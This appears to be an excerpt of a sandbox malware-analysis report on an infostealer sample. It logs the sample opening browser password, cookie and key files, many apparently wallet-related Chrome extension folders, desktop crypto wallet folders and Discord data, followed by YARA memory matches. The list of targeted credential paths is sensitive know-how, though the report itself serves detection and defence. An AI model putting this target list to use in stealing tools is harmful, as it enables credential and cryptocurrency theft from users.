                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-wal
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\Profiles
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\Default\AppData\Roaming\8pecxstudios\Cyberfox\Profiles
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\protections.sqlite
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\favicons.sqlite
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\Public\AppData\Roaming\Mozilla\Firefox\Profiles
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnnegphlobjdpkhecapkijjdkgcjhkib
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\Public\AppData\Roaming\8pecxstudios\Cyberfox\Profiles
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\security_state
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-wal
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\eigblbgjknlfbajkfhopmcojidlgcehm
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\webappsstore.sqlite-shm
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pnlfjmlcjdjgkddecgincndfgegkecke
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jblndlipeogpafnldhgmapagcccfchpi
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2918063365piupsah.files
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ca4gppea.default
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bocpokimicclpaiekenaeelehdjllofo
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-shm
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\bookmarkbackups
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\crashes\events
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\temporary
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\events
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite-shm
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\agoakfejjabomempkjlepdflaleeobhb
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\webappsstore.sqlite-wal
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.json
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\tmp
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ebfidpplhabeedpnhjnobghokpiioolj
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\saved-telemetry-pings
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\content-prefs.sqlite
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-wal
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mfgccjchihfkkindfppnaooecgfneiii
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\default
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfk
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfnd
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\webappsstore.sqlite
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcckkdbjnoikooededlapcalpionmalo
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\to-be-removed
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite-wal
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\minidumps
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfel
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\Default\AppData\Roaming\Mozilla\Firefox\Profiles
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\favicons.sqlite-shm
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mfhbebgoclkghebffdldpobeajmbecfk
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\ls-archive.sqlite
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pocmplpaccanhmnllbbkpgfliimjljgo
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\crashes
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-wal
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\pending_pings
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\db
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cmndjbecilbocjfkibfbifhngkdmjgog
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\favicons.sqlite-wal
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\Default\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\Default\AppData\Roaming\Guarda\Local Storage\leveldb
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\Default\AppData\Roaming\Exodus\exodus.wallet
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\Default\AppData\Roaming\Electrum\wallets
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\Default\AppData\Roaming\atomic\Local Storage\leveldb
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\Default\AppData\Roaming\Coinomi\Coinomi\wallets
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\Public\AppData\Roaming\Exodus\exodus.wallet
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\Public\AppData\Roaming\Electrum\wallets
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\Public\AppData\Roaming\atomic\Local Storage\leveldb
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Public\AppData\Roaming\Coinomi\Coinomi\walletsJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Public\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldbJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Public\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\walletsJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldbJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Default\AppData\Local\discordJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Default\AppData\Local\discordcanaryJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Default\AppData\Local\discordptbJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Default\AppData\Local\discorddevelopmentJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Public\AppData\Local\discordJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Public\AppData\Local\discordcanaryJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Public\AppData\Local\discordptbJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Public\AppData\Local\discorddevelopmentJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\discordJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\discordcanaryJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\discordptbJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\discorddevelopmentJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeDirectory queried: C:\Users\Default\DocumentsJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeDirectory queried: C:\Users\Public\DocumentsJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
Source: Yara match | File source: 22.2.SecurityHealthSystray.exe.280000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.SecurityHealthSystray.exe.280000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: WdlA0C4PkO.exe PID: 7648, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SecurityHealthSystray.exe PID: 7388, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SecurityHealthSystray.exe PID: 3348, type: MEMORYSTR
